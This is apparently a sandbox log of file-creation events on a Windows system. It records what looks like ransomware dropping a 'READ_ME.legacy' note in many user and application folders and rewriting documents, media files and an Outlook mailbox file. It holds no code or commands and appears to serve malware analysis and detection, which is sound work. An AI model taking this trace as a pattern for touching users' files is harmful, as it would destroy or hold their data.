Create	\Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\vcredist_x86.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\VC_redist.x86.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOPrivate\UpdateStore\UpdateCspStore.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateUx.002.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateUx.001.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.028.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.027.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.026.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.025.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.024.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.023.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.022.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.021.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.020.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.019.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.018.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.017.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.016.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.015.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.014.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.013.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.012.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.011.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.010.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.009.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.008.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.007.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.006.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.005.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.004.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.003.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.002.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.001.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.017.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.016.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.015.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.014.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.013.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.012.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.011.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.010.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.009.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.008.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.007.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.006.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.005.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.004.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.003.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.002.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUxBroker.001.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUx.002.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\NotificationUx.001.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\ActiveSync\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Adobe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Application Data\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\CEF\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Comms\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\ConnectedDevicesPlatform\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Google\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\History\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\MicrosoftEdge\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Mozilla\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\PeerDistRepub\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Publishers\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Temporary Internet Files\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\TileDataLayer\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\UNP\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\VirtualStore\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\IconCache.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\LocalLow\Adobe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\LocalLow\Mozilla\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\LocalLow\Sun\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\Adobe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\Macromedia\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\Mozilla\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\Skype\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\Sun\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\_F7FuPIdThg7qiX2nF.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\ZF7tl.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\Z-2ETQPJ31.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\xGXb528kMUsF1-UX_rs.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\Wswb-158BPkxDz7ZA.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\VUgIW-P3N88.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\VnSUE9RNa.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\tFvxMQgEB.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\tbYLfhp-ipjFW.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\t bm0QhvdC.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\qxPSVoftxL.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\qsFMcsP7SF7Y5f.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\QMCy85dfaOOQUVZ.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\qKDnt8nOJ.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\Q8l5y.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\Q5uGyvVnf.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\pg81BDYZElXb.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\OSIoVoN9.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\oKkcll n BcmUUI e.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\o8E6mZSi5.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\l4tZ.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\iviN1DXG16RTV5j.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\HBUuJIee6 B.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\GTvX8uZu4VVL em6HpmN.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\fL2x0_UbFCma9-HfWpPr.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\dCYRa.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\ahmeaRl.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\7v42XS45.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\7j6Oc.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\60vWEujdA.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\5PuIwJvIS.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\3vdL0rQ_1x4ZXXzw1.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\28Du.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\1gqIePIojUZd8h.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\-GJwjeUmEuPXS0yxP.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\F5EXUt1f1Xqj\YvhWKZNK8DjdusuAkDOg.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\F5EXUt1f1Xqj\uAljyAp q12x88Oo_Pb.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\F5EXUt1f1Xqj\soy3Vu vLzyRX0z3ru.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\F5EXUt1f1Xqj\mbGpALg83B8_CPy.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\F5EXUt1f1Xqj\HCc2m2Kp.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\F5EXUt1f1Xqj\gOYAfd6941Fl5Ebq.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\F5EXUt1f1Xqj\cUIt0qjTED4Aa4c5Q.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\F5EXUt1f1Xqj\c5-u_l1Lz8YJ.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\My Shapes\_private\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\My Shapes\Favorites.vssx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\My Shapes\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\6pegi30GmfrfqiXg89d\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\mj-Ues9dGF2\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\vG1o\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\ZEJ4AMkjS2mO\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\XbKBrhV.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\T FUxorV3za95hcDa.pps	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\PErcgE7gQd3tqp0.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\Ka4sw.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\hkfLmu88BzqyS9mkQa.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\F_W-HXxlKUh0nFJn.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\ewD4MeSMGV8e1.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Favorites\Links\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\FO7jTe\A2m0KN E2VxFW_QW8sv9\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\FO7jTe\D9tbzC8GRXgS\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\FO7jTe\zwnicmJ7nmg.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\FO7jTe\WAUNmDL.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\FO7jTe\VviRV5q.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\FO7jTe\ki1g5jX8sFk.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\FO7jTe\7sUXHqc1ujAXFk.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\Camera Roll\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\Saved Pictures\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\-pkIr 0gswkCHrf_\mlex1y-6OlsYQmwrNAN\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\-pkIr 0gswkCHrf_\MljGq6d-bw\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\-pkIr 0gswkCHrf_\Z3zyHkdy44dT.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\-pkIr 0gswkCHrf_\Uckehz.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\-pkIr 0gswkCHrf_\3ryGZ7L.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
